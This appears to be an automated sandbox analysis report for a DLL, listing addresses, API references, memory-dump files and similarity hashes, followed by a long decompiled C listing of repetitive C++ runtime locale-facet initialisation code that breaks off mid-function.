0x6d480d74
0x6d480d72
0x6d480ce5
0x6d480ce5
0x6d480ce8
0x6d480cec
0x6d480cf0
0x6d480cfd
0x6d480d05
0x6d480d07
0x00000000
0x6d480d07
0x6d480cce
0x6d480cce
0x00000000
0x6d480cce
0x6d480ccc
0x6d480c3f
0x6d480c3f
0x6d480c42
0x6d480c46
0x6d480c4a
0x6d480c57
0x6d480c5f
0x6d480c61
0x00000000
0x6d480c61
0x6d480c28
0x6d480c28
0x00000000
0x6d480c28
0x6d480c26
0x6d480b99
0x6d480b99
0x6d480b9c
0x6d480ba0
0x6d480ba4
0x6d480bb1
0x6d480bb9
0x6d480bbb
0x00000000
0x6d480bbb
0x6d480b82
0x6d480b82
0x00000000
0x6d480b82
0x6d480b80
0x6d480af3
0x6d480af3
0x6d480af6
0x6d480afa
0x6d480afe
0x6d480b0b
0x6d480b13
0x6d480b15
0x00000000
0x6d480b15
0x6d480adc
0x6d480adc
0x00000000
0x6d480adc
0x6d480ada
0x6d480a4d
0x6d480a4d
0x6d480a50
0x6d480a54
0x6d480a58
0x6d480a65
0x6d480a6d
0x6d480a6f
0x00000000
0x6d480a6f
0x6d480a36
0x6d480a36
0x00000000
0x6d480a36
0x6d480a34
0x6d4809a7
0x6d4809a7
0x6d4809aa
0x6d4809ae
0x6d4809b2
0x6d4809bf
0x6d4809c7
0x6d4809c9
0x00000000
0x6d4809c9
0x6d480990
0x6d480990
0x00000000
0x6d480990
0x6d48098e
0x6d480901
0x6d480901
0x6d480904
0x6d480908
0x6d48090c
0x6d480919
0x6d480921
0x6d480923
0x00000000
0x6d480923
0x6d4808ea
0x6d4808ea
0x00000000
0x6d4808ea
0x6d4808e8
0x6d48085b
0x6d48085b
0x6d48085e
0x6d480862
0x6d480866
0x6d480873
0x6d48087b
0x6d48087d
0x00000000
0x6d48087d
0x6d480844
0x6d480844
0x00000000
0x6d480844
0x6d480842
0x6d4807b5
0x6d4807b5
0x6d4807b8
0x6d4807bc
0x6d4807c0
0x6d4807cd
0x6d4807d5
0x6d4807d7
0x00000000
0x6d4807d7
0x6d48079e
0x6d48079e
0x00000000
0x6d48079e
0x6d48079c
0x6d48070f
0x6d48070f
0x6d480712
0x6d480716
0x6d48071a
0x6d480727
0x6d48072f
0x6d480731
0x00000000
0x6d480731
0x6d4806f8
0x6d4806f8
0x00000000
0x6d4806f8
0x6d4806f6
0x6d480669
0x6d480669
0x6d48066c
0x6d480670
0x6d480674
0x6d480681
0x6d480689
0x6d48068b
0x00000000
0x6d48068b
0x6d480652
0x6d480652
0x00000000
0x6d480652
0x6d480650
0x6d4805c3
0x6d4805c3
0x6d4805c6
0x6d4805ca
0x6d4805ce
0x6d4805db
0x6d4805e3
0x6d4805e5
0x00000000
0x6d4805e5
0x6d4805ac
0x6d4805ac
0x00000000
0x6d4805ac
0x6d4805aa

APIs

__EH_prolog3.LIBCMT ref: 6D480573
std::_Lockit::_Lockit.LIBCPMT ref: 6D48057D

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

ctype.LIBCPMT ref: 6D4805B7
std::_Facet_Register.LIBCPMT ref: 6D4805CE
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4805EE
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48060C

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowctype
String ID:
API String ID: 1394824916-0
Opcode ID: 27a7bfbbae37d4812fa3357678f7db8e5075237dca8cb9f71f56a832bb1b8096
Instruction ID: f48b6790a781b0bfba114ec4271584c4cf2c65701337db8361fc1e01497c0246
Opcode Fuzzy Hash: 27a7bfbbae37d4812fa3357678f7db8e5075237dca8cb9f71f56a832bb1b8096
Instruction Fuzzy Hash: 5211AC72C042298BCF05DBA5C990EEE7775AF84364F26040DD611AB390EF34EE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480420, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6D480420(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t307;
				signed int _t308;
				void* _t320;
				void* _t333;
				void* _t346;
				void* _t359;
				void* _t372;
				void* _t385;
				void* _t398;
				void* _t411;
				void* _t424;
				void* _t437;
				void* _t450;
				void* _t463;
				void* _t476;
				void* _t489;
				void* _t502;
				void* _t515;
				void* _t528;
				void* _t541;
				void* _t554;
				void* _t567;
				signed int _t815;
				signed int _t882;
				signed int _t883;
				signed int _t884;
				signed int _t885;
				signed int _t886;
				signed int _t887;
				signed int _t888;
				signed int _t889;
				signed int _t890;
				signed int _t891;
				signed int _t892;
				signed int _t893;
				signed int _t894;
				signed int _t895;
				signed int _t896;
				signed int _t897;
				signed int _t898;
				signed int _t899;
				signed int _t900;
				signed int _t901;
				signed int _t903;
				signed int _t904;
				signed int _t905;
				signed int _t906;
				signed int _t907;
				signed int _t908;
				signed int _t909;
				signed int _t910;
				signed int _t911;
				signed int _t912;
				signed int _t913;
				signed int _t914;
				signed int _t915;
				signed int _t916;
				signed int _t917;
				signed int _t918;
				signed int _t919;
				signed int _t920;
				signed int _t921;
				signed int _t922;
				signed int _t923;
				signed int _t924;
				void* _t946;
				void* _t950;

				_t879 = __edx;
				_t668 = __ebx;
				_push(0x14);
				E6D490E9E(0x6d4fe9a2, __ebx, __edi, __esi);
				E6D476A10(_t946 - 0x14, 0);
				_t903 =  *0x6d53fdf8; // 0x0
				 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
				 *(_t946 - 0x10) = _t903;
				_t307 = E6D451D10();
				_t671 =  *((intOrPtr*)(_t946 + 8));
				_t308 = E6D452140( *((intOrPtr*)(_t946 + 8)), _t307);
				_t881 = _t308;
				if(_t308 != 0) {
					L5:
					E6D476A77(_t946 - 0x14);
					return E6D490E67(_t881);
				} else {
					if(_t903 == 0) {
						_push( *((intOrPtr*)(_t946 + 8)));
						_push(_t946 - 0x10);
						__eflags = E6D4821A1(__ebx, _t671, __edx, _t881, _t903, __eflags, _t950) - 0xffffffff;
						if(__eflags == 0) {
							E6D451940();
							E6D4924F4(_t946 - 0x20, 0x6d5329cc);
							asm("int3");
							_push(0x14);
							E6D490E9E(0x6d4fe9a2, __ebx, _t881, _t903);
							E6D476A10(_t946 - 0x14, 0);
							_t904 =  *0x6d53fdc8; // 0x0
							 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
							 *(_t946 - 0x10) = _t904;
							_t320 = E6D451D10();
							_t678 =  *((intOrPtr*)(_t946 + 8));
							_t882 = E6D452140( *((intOrPtr*)(_t946 + 8)), _t320);
							__eflags = _t882;
							if(_t882 != 0) {
								L12:
								E6D476A77(_t946 - 0x14);
								return E6D490E67(_t882);
							} else {
								__eflags = _t904;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t946 + 8)));
									_push(_t946 - 0x10);
									__eflags = E6D482243(_t668, _t678, __edx, _t882, _t904, __eflags, _t950) - 0xffffffff;
									if(__eflags == 0) {
										E6D451940();
										E6D4924F4(_t946 - 0x20, 0x6d5329cc);
										asm("int3");
										_push(0x14);
										E6D490E9E(0x6d4fe9a2, _t668, _t882, _t904);
										E6D476A10(_t946 - 0x14, 0);
										_t905 =  *0x6d53fde8; // 0x0
										 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
										 *(_t946 - 0x10) = _t905;
										_t333 = E6D451D10();
										_t685 =  *((intOrPtr*)(_t946 + 8));
										_t883 = E6D452140( *((intOrPtr*)(_t946 + 8)), _t333);
										__eflags = _t883;
										if(_t883 != 0) {
											L19:
											E6D476A77(_t946 - 0x14);
											return E6D490E67(_t883);
										} else {
											__eflags = _t905;
											if(__eflags == 0) {
												_push( *((intOrPtr*)(_t946 + 8)));
												_push(_t946 - 0x10);
												__eflags = E6D4822E5(_t668, _t685, __edx, _t883, _t905, __eflags, _t950) - 0xffffffff;
												if(__eflags == 0) {
													E6D451940();
													E6D4924F4(_t946 - 0x20, 0x6d5329cc);
													asm("int3");
													_push(0x14);
													E6D490E9E(0x6d4fe9a2, _t668, _t883, _t905);
													E6D476A10(_t946 - 0x14, 0);
													_t906 =  *0x6d53fdfc; // 0x0
													 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
													 *(_t946 - 0x10) = _t906;
													_t346 = E6D451D10();
													_t692 =  *((intOrPtr*)(_t946 + 8));
													_t884 = E6D452140( *((intOrPtr*)(_t946 + 8)), _t346);
													__eflags = _t884;
													if(_t884 != 0) {
														L26:
														E6D476A77(_t946 - 0x14);
														return E6D490E67(_t884);
													} else {
														__eflags = _t906;
														if(__eflags == 0) {
															_push( *((intOrPtr*)(_t946 + 8)));
															_push(_t946 - 0x10);
															__eflags = E6D482355(_t668, _t692, _t879, _t884, _t906, __eflags, _t950) - 0xffffffff;
															if(__eflags == 0) {
																E6D451940();
																E6D4924F4(_t946 - 0x20, 0x6d5329cc);
																asm("int3");
																_push(0x14);
																E6D490E9E(0x6d4fe9a2, _t668, _t884, _t906);
																E6D476A10(_t946 - 0x14, 0);
																_t907 =  *0x6d53fdcc; // 0x0
																 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																 *(_t946 - 0x10) = _t907;
																_t359 = E6D451D10();
																_t699 =  *((intOrPtr*)(_t946 + 8));
																_t885 = E6D452140( *((intOrPtr*)(_t946 + 8)), _t359);
																__eflags = _t885;
																if(_t885 != 0) {
																	L33:
																	E6D476A77(_t946 - 0x14);
																	return E6D490E67(_t885);
																} else {
																	__eflags = _t907;
																	if(__eflags == 0) {
																		_push( *((intOrPtr*)(_t946 + 8)));
																		_push(_t946 - 0x10);
																		__eflags = E6D4823BD(_t668, _t699, _t879, _t885, _t907, __eflags, _t950) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D451940();
																			E6D4924F4(_t946 - 0x20, 0x6d5329cc);
																			asm("int3");
																			_push(0x14);
																			E6D490E9E(0x6d4fe9a2, _t668, _t885, _t907);
																			E6D476A10(_t946 - 0x14, 0);
																			_t908 =  *0x6d53fe00; // 0x0
																			 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																			 *(_t946 - 0x10) = _t908;
																			_t372 = E6D451D10();
																			_t706 =  *((intOrPtr*)(_t946 + 8));
																			_t886 = E6D452140( *((intOrPtr*)(_t946 + 8)), _t372);
																			__eflags = _t886;
																			if(_t886 != 0) {
																				L40:
																				E6D476A77(_t946 - 0x14);
																				return E6D490E67(_t886);
																			} else {
																				__eflags = _t908;
																				if(__eflags == 0) {
																					_push( *((intOrPtr*)(_t946 + 8)));
																					_push(_t946 - 0x10);
																					__eflags = E6D482425(_t668, _t706, _t879, _t886, _t908, __eflags, _t950) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D451940();
																						E6D4924F4(_t946 - 0x20, 0x6d5329cc);
																						asm("int3");
																						_push(0x14);
																						E6D490E9E(0x6d4fe9a2, _t668, _t886, _t908);
																						E6D476A10(_t946 - 0x14, 0);
																						_t909 =  *0x6d53fdd0; // 0x0
																						 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																						 *(_t946 - 0x10) = _t909;
																						_t385 = E6D451D10();
																						_t713 =  *((intOrPtr*)(_t946 + 8));
																						_t887 = E6D452140( *((intOrPtr*)(_t946 + 8)), _t385);
																						__eflags = _t887;
																						if(_t887 != 0) {
																							L47:
																							E6D476A77(_t946 - 0x14);
																							return E6D490E67(_t887);
																						} else {
																							__eflags = _t909;
																							if(__eflags == 0) {
																								_push( *((intOrPtr*)(_t946 + 8)));
																								_push(_t946 - 0x10);
																								__eflags = E6D48248D(_t668, _t713, _t879, _t887, _t909, __eflags, _t950) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D451940();
																									E6D4924F4(_t946 - 0x20, 0x6d5329cc);
																									asm("int3");
																									_push(0x14);
																									E6D490E9E(0x6d4fe9a2, _t668, _t887, _t909);
																									E6D476A10(_t946 - 0x14, 0);
																									_t910 =  *0x6d53fe04; // 0x0
																									 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																									 *(_t946 - 0x10) = _t910;
																									_t398 = E6D451D10();
																									_t720 =  *((intOrPtr*)(_t946 + 8));
																									_t888 = E6D452140( *((intOrPtr*)(_t946 + 8)), _t398);
																									__eflags = _t888;
																									if(_t888 != 0) {
																										L54:
																										E6D476A77(_t946 - 0x14);
																										return E6D490E67(_t888);
																									} else {
																										__eflags = _t910;
																										if(__eflags == 0) {
																											_push( *((intOrPtr*)(_t946 + 8)));
																											_push(_t946 - 0x10);
																											__eflags = E6D4824F5(_t668, _t720, _t879, _t888, _t910, __eflags, _t950) - 0xffffffff;
																											if(__eflags == 0) {
																												E6D451940();
																												E6D4924F4(_t946 - 0x20, 0x6d5329cc);
																												asm("int3");
																												_push(0x14);
																												E6D490E9E(0x6d4fe9a2, _t668, _t888, _t910);
																												E6D476A10(_t946 - 0x14, 0);
																												_t911 =  *0x6d53fdd4; // 0x0
																												 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																												 *(_t946 - 0x10) = _t911;
																												_t411 = E6D451D10();
																												_t727 =  *((intOrPtr*)(_t946 + 8));
																												_t889 = E6D452140( *((intOrPtr*)(_t946 + 8)), _t411);
																												__eflags = _t889;
																												if(_t889 != 0) {
																													L61:
																													E6D476A77(_t946 - 0x14);
																													return E6D490E67(_t889);
																												} else {
																													__eflags = _t911;
																													if(__eflags == 0) {
																														_push( *((intOrPtr*)(_t946 + 8)));
																														_push(_t946 - 0x10);
																														__eflags = E6D48255D(_t668, _t727, _t879, _t889, _t911, __eflags, _t950) - 0xffffffff;
																														if(__eflags == 0) {
																															E6D451940();
																															E6D4924F4(_t946 - 0x20, 0x6d5329cc);
																															asm("int3");
																															_push(0x14);
																															E6D490E9E(0x6d4fe9a2, _t668, _t889, _t911);
																															E6D476A10(_t946 - 0x14, 0);
																															_t912 =  *0x6d53fe0c; // 0x0
																															 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																															 *(_t946 - 0x10) = _t912;
																															_t424 = E6D451D10();
																															_t734 =  *((intOrPtr*)(_t946 + 8));
																															_t890 = E6D452140( *((intOrPtr*)(_t946 + 8)), _t424);
																															__eflags = _t890;
																															if(_t890 != 0) {
																																L68:
																																E6D476A77(_t946 - 0x14);
																																return E6D490E67(_t890);
																															} else {
																																__eflags = _t912;
																																if(__eflags == 0) {
																																	_push( *((intOrPtr*)(_t946 + 8)));
																																	_push(_t946 - 0x10);
																																	__eflags = E6D4825C5(_t668, _t734, _t879, _t890, _t912, __eflags, _t950) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6D451940();
																																		E6D4924F4(_t946 - 0x20, 0x6d5329cc);
																																		asm("int3");
																																		_push(0x14);
																																		E6D490E9E(0x6d4fe9a2, _t668, _t890, _t912);
																																		E6D476A10(_t946 - 0x14, 0);
																																		_t913 =  *0x6d53fe08; // 0x0
																																		 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																		 *(_t946 - 0x10) = _t913;
																																		_t437 = E6D451D10();
																																		_t741 =  *((intOrPtr*)(_t946 + 8));
																																		_t891 = E6D452140( *((intOrPtr*)(_t946 + 8)), _t437);
																																		__eflags = _t891;
																																		if(_t891 != 0) {
																																			L75:
																																			E6D476A77(_t946 - 0x14);
																																			return E6D490E67(_t891);
																																		} else {
																																			__eflags = _t913;
																																			if(__eflags == 0) {
																																				_push( *((intOrPtr*)(_t946 + 8)));
																																				_push(_t946 - 0x10);
																																				__eflags = E6D482649(_t668, _t741, _t879, _t891, _t913, __eflags, _t950) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6D451940();
																																					E6D4924F4(_t946 - 0x20, 0x6d5329cc);
																																					asm("int3");
																																					_push(0x14);
																																					E6D490E9E(0x6d4fe9a2, _t668, _t891, _t913);
																																					E6D476A10(_t946 - 0x14, 0);
																																					_t914 =  *0x6d53fddc; // 0x0
																																					 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																					 *(_t946 - 0x10) = _t914;
																																					_t450 = E6D451D10();
																																					_t748 =  *((intOrPtr*)(_t946 + 8));
																																					_t892 = E6D452140( *((intOrPtr*)(_t946 + 8)), _t450);
																																					__eflags = _t892;
																																					if(_t892 != 0) {
																																						L82:
																																						E6D476A77(_t946 - 0x14);
																																						return E6D490E67(_t892);
																																					} else {
																																						__eflags = _t914;
																																						if(__eflags == 0) {
																																							_push( *((intOrPtr*)(_t946 + 8)));
																																							_push(_t946 - 0x10);
																																							__eflags = E6D4826CE(_t668, _t748, _t879, _t892, _t914, __eflags, _t950) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6D451940();
																																								E6D4924F4(_t946 - 0x20, 0x6d5329cc);
																																								asm("int3");
																																								_push(0x14);
																																								E6D490E9E(0x6d4fe9a2, _t668, _t892, _t914);
																																								E6D476A10(_t946 - 0x14, 0);
																																								_t915 =  *0x6d53fdd8; // 0x0
																																								 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																								 *(_t946 - 0x10) = _t915;
																																								_t463 = E6D451D10();
																																								_t755 =  *((intOrPtr*)(_t946 + 8));
																																								_t893 = E6D452140( *((intOrPtr*)(_t946 + 8)), _t463);
																																								__eflags = _t893;
																																								if(_t893 != 0) {
																																									L89:
																																									E6D476A77(_t946 - 0x14);
																																									return E6D490E67(_t893);
																																								} else {
																																									__eflags = _t915;
																																									if(__eflags == 0) {
																																										_push( *((intOrPtr*)(_t946 + 8)));
																																										_push(_t946 - 0x10);
																																										__eflags = E6D482752(_t668, _t755, _t879, _t893, _t915, __eflags, _t950) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6D451940();
																																											E6D4924F4(_t946 - 0x20, 0x6d5329cc);
																																											asm("int3");
																																											_push(0x14);
																																											E6D490E9E(0x6d4fe9a2, _t668, _t893, _t915);
																																											E6D476A10(_t946 - 0x14, 0);
																																											_t916 =  *0x6d53fdec; // 0x0
																																											 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																											 *(_t946 - 0x10) = _t916;
																																											_t476 = E6D451D10();
																																											_t762 =  *((intOrPtr*)(_t946 + 8));
																																											_t894 = E6D452140( *((intOrPtr*)(_t946 + 8)), _t476);
																																											__eflags = _t894;
																																											if(_t894 != 0) {
																																												L96:
																																												E6D476A77(_t946 - 0x14);
																																												return E6D490E67(_t894);
																																											} else {
																																												__eflags = _t916;
																																												if(__eflags == 0) {
																																													_push( *((intOrPtr*)(_t946 + 8)));
																																													_push(_t946 - 0x10);
																																													__eflags = E6D4827D7(_t668, _t762, _t879, _t894, _t916, __eflags, _t950) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6D451940();
																																														E6D4924F4(_t946 - 0x20, 0x6d5329cc);
																																														asm("int3");
																																														_push(0x14);
																																														E6D490E9E(0x6d4fe9a2, _t668, _t894, _t916);
																																														E6D476A10(_t946 - 0x14, 0);
																																														_t917 =  *0x6d53fdc4; // 0x0
																																														 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																														 *(_t946 - 0x10) = _t917;
																																														_t489 = E6D451D10();
																																														_t769 =  *((intOrPtr*)(_t946 + 8));
																																														_t895 = E6D452140( *((intOrPtr*)(_t946 + 8)), _t489);
																																														__eflags = _t895;
																																														if(_t895 != 0) {
																																															L103:
																																															E6D476A77(_t946 - 0x14);
																																															return E6D490E67(_t895);
																																														} else {
																																															__eflags = _t917;
																																															if(__eflags == 0) {
																																																_push( *((intOrPtr*)(_t946 + 8)));
																																																_push(_t946 - 0x10);
																																																__eflags = E6D48283F(_t668, _t769, _t879, _t895, _t917, __eflags, _t950) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6D451940();
																																																	E6D4924F4(_t946 - 0x20, 0x6d5329cc);
																																																	asm("int3");
																																																	_push(0x14);
																																																	E6D490E9E(0x6d4fe9a2, _t668, _t895, _t917);
																																																	E6D476A10(_t946 - 0x14, 0);
																																																	_t918 =  *0x6d53fdf0; // 0x0
																																																	 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																	 *(_t946 - 0x10) = _t918;
																																																	_t502 = E6D451D10();
																																																	_t776 =  *((intOrPtr*)(_t946 + 8));
																																																	_t896 = E6D452140( *((intOrPtr*)(_t946 + 8)), _t502);
																																																	__eflags = _t896;
																																																	if(_t896 != 0) {
																																																		L110:
																																																		E6D476A77(_t946 - 0x14);
																																																		return E6D490E67(_t896);
																																																	} else {
																																																		__eflags = _t918;
																																																		if(__eflags == 0) {
																																																			_push( *((intOrPtr*)(_t946 + 8)));
																																																			_push(_t946 - 0x10);
																																																			__eflags = E6D4828A7(_t668, _t776, _t879, _t896, _t918, __eflags, _t950) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6D451940();
																																																				E6D4924F4(_t946 - 0x20, 0x6d5329cc);
																																																				asm("int3");
																																																				_push(0x14);
																																																				E6D490E9E(0x6d4fe9a2, _t668, _t896, _t918);
																																																				E6D476A10(_t946 - 0x14, 0);
																																																				_t919 =  *0x6d53fdf4; // 0x0
																																																				 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																				 *(_t946 - 0x10) = _t919;
																																																				_t515 = E6D451D10();
																																																				_t783 =  *((intOrPtr*)(_t946 + 8));
																																																				_t897 = E6D452140( *((intOrPtr*)(_t946 + 8)), _t515);
																																																				__eflags = _t897;
																																																				if(_t897 != 0) {
																																																					L117:
																																																					E6D476A77(_t946 - 0x14);
																																																					return E6D490E67(_t897);
																																																				} else {
																																																					__eflags = _t919;
																																																					if(__eflags == 0) {
																																																						_push( *((intOrPtr*)(_t946 + 8)));
																																																						_push(_t946 - 0x10);
																																																						__eflags = E6D48290F(_t668, _t783, _t879, _t897, _t919, __eflags, _t950) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6D451940();
																																																							E6D4924F4(_t946 - 0x20, 0x6d5329cc);
																																																							asm("int3");
																																																							_push(0x14);
																																																							E6D490E9E(0x6d4fe9a2, _t668, _t897, _t919);
																																																							E6D476A10(_t946 - 0x14, 0);
																																																							_t920 =  *0x6d53fe10; // 0x0
																																																							 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																							 *(_t946 - 0x10) = _t920;
																																																							_t528 = E6D451D10();
																																																							_t790 =  *((intOrPtr*)(_t946 + 8));
																																																							_t898 = E6D452140( *((intOrPtr*)(_t946 + 8)), _t528);
																																																							__eflags = _t898;
																																																							if(_t898 != 0) {
																																																								L124:
																																																								E6D476A77(_t946 - 0x14);
																																																								return E6D490E67(_t898);
																																																							} else {
																																																								__eflags = _t920;
																																																								if(__eflags == 0) {
																																																									_push( *((intOrPtr*)(_t946 + 8)));
																																																									_push(_t946 - 0x10);
																																																									__eflags = E6D48298A(_t668, _t790, _t879, _t898, _t920, __eflags, _t950) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6D451940();
																																																										E6D4924F4(_t946 - 0x20, 0x6d5329cc);
																																																										asm("int3");
																																																										_push(0x14);
																																																										E6D490E9E(0x6d4fe9a2, _t668, _t898, _t920);
																																																										E6D476A10(_t946 - 0x14, 0);
																																																										_t921 =  *0x6d53fde0; // 0x0
																																																										 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																										 *(_t946 - 0x10) = _t921;
																																																										_t541 = E6D451D10();
																																																										_t797 =  *((intOrPtr*)(_t946 + 8));
																																																										_t899 = E6D452140( *((intOrPtr*)(_t946 + 8)), _t541);
																																																										__eflags = _t899;
																																																										if(_t899 != 0) {
																																																											L131:
																																																											E6D476A77(_t946 - 0x14);
																																																											return E6D490E67(_t899);
																																																										} else {
																																																											__eflags = _t921;
																																																											if(__eflags == 0) {
																																																												_push( *((intOrPtr*)(_t946 + 8)));
																																																												_push(_t946 - 0x10);
																																																												__eflags = E6D4829F6(_t668, _t797, _t879, _t899, _t921, __eflags, _t950) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													E6D451940();
																																																													E6D4924F4(_t946 - 0x20, 0x6d5329cc);
																																																													asm("int3");
																																																													_push(0x14);
																																																													E6D490E9E(0x6d4fe9a2, _t668, _t899, _t921);
																																																													E6D476A10(_t946 - 0x14, 0);
																																																													_t922 =  *0x6d53fe14; // 0x0
																																																													 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																													 *(_t946 - 0x10) = _t922;
																																																													_t554 = E6D451D10();
																																																													_t804 =  *((intOrPtr*)(_t946 + 8));
																																																													_t900 = E6D452140( *((intOrPtr*)(_t946 + 8)), _t554);
																																																													__eflags = _t900;
																																																													if(_t900 != 0) {
																																																														L138:
																																																														E6D476A77(_t946 - 0x14);
																																																														return E6D490E67(_t900);
																																																													} else {
																																																														__eflags = _t922;
																																																														if(__eflags == 0) {
																																																															_push( *((intOrPtr*)(_t946 + 8)));
																																																															_push(_t946 - 0x10);
																																																															__eflags = E6D482A62(_t668, _t804, _t879, _t900, _t922, __eflags, _t950) - 0xffffffff;
																																																															if(__eflags == 0) {
																																																																E6D451940();
																																																																E6D4924F4(_t946 - 0x20, 0x6d5329cc);
																																																																asm("int3");
																																																																_push(0x14);
																																																																E6D490E9E(0x6d4fe9a2, _t668, _t900, _t922);
																																																																E6D476A10(_t946 - 0x14, 0);
																																																																_t923 =  *0x6d53fde4; // 0x0
																																																																 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																																 *(_t946 - 0x10) = _t923;
																																																																_t567 = E6D451D10();
																																																																_t811 =  *((intOrPtr*)(_t946 + 8));
																																																																_t901 = E6D452140( *((intOrPtr*)(_t946 + 8)), _t567);
																																																																__eflags = _t901;
																																																																if(_t901 != 0) {
																																																																	L145:
																																																																	E6D476A77(_t946 - 0x14);
																																																																	return E6D490E67(_t901);
																																																																} else {
																																																																	__eflags = _t923;
																																																																	if(__eflags == 0) {
																																																																		_push( *((intOrPtr*)(_t946 + 8)));
																																																																		_push(_t946 - 0x10);
																																																																		__eflags = E6D482AC8(_t668, _t811, _t879, _t901, _t923, __eflags, _t950) - 0xffffffff;
																																																																		if(__eflags == 0) {
																																																																			_t815 = _t946 - 0x20;
																																																																			E6D451940();
																																																																			E6D4924F4(_t946 - 0x20, 0x6d5329cc);
																																																																			asm("int3");
																																																																			_push(4);
																																																																			E6D490E9E(0x6d4fefbc, _t668, _t901, _t923);
																																																																			_t924 = _t815;
																																																																			 *(_t946 - 0x10) = _t924;
																																																																			 *((intOrPtr*)(_t924 + 4)) =  *((intOrPtr*)(_t946 + 0xc));
																																																																			_push( *((intOrPtr*)(_t946 + 0x14)));
																																																																			_push( *((intOrPtr*)(_t946 + 8)));
																																																																			_t301 = _t946 - 4;
																																																																			 *_t301 =  *(_t946 - 4) & 0x00000000;
																																																																			__eflags =  *_t301;
																																																																			 *_t924 = 0x6d5041ac;
																																																																			 *((char*)(_t924 + 0x28)) =  *((intOrPtr*)(_t946 + 0x10));
																																																																			E6D4868B7(_t668, _t815, _t879, _t901, _t924,  *_t301, _t950);
																																																																			return E6D490E67(_t924);
																																																																		} else {
																																																																			_t901 =  *(_t946 - 0x10);
																																																																			 *(_t946 - 0x10) = _t901;
																																																																			 *(_t946 - 4) = 1;
																																																																			E6D478A0B(__eflags, _t901);
																																																																			 *0x6d5001e8();
																																																																			 *((intOrPtr*)( *((intOrPtr*)( *_t901 + 4))))();
																																																																			 *0x6d53fde4 = _t901;
																																																																			goto L145;
																																																																		}
																																																																	} else {
																																																																		_t901 = _t923;
																																																																		goto L145;
																																																																	}
																																																																}
																																																															} else {
																																																																_t900 =  *(_t946 - 0x10);
																																																																 *(_t946 - 0x10) = _t900;
																																																																 *(_t946 - 4) = 1;
																																																																E6D478A0B(__eflags, _t900);
																																																																 *0x6d5001e8();
																																																																 *((intOrPtr*)( *((intOrPtr*)( *_t900 + 4))))();
																																																																 *0x6d53fe14 = _t900;
																																																																goto L138;
																																																															}
																																																														} else {
																																																															_t900 = _t922;
																																																															goto L138;
																																																														}
																																																													}
																																																												} else {
																																																													_t899 =  *(_t946 - 0x10);
																																																													 *(_t946 - 0x10) = _t899;
																																																													 *(_t946 - 4) = 1;
																																																													E6D478A0B(__eflags, _t899);
																																																													 *0x6d5001e8();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t899 + 4))))();
																																																													 *0x6d53fde0 = _t899;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t899 = _t921;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t898 =  *(_t946 - 0x10);
																																																										 *(_t946 - 0x10) = _t898;
																																																										 *(_t946 - 4) = 1;
																																																										E6D478A0B(__eflags, _t898);
																																																										 *0x6d5001e8();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t898 + 4))))();
																																																										 *0x6d53fe10 = _t898;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t898 = _t920;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t897 =  *(_t946 - 0x10);
																																																							 *(_t946 - 0x10) = _t897;
																																																							 *(_t946 - 4) = 1;
																																																							E6D478A0B(__eflags, _t897);
																																																							 *0x6d5001e8();
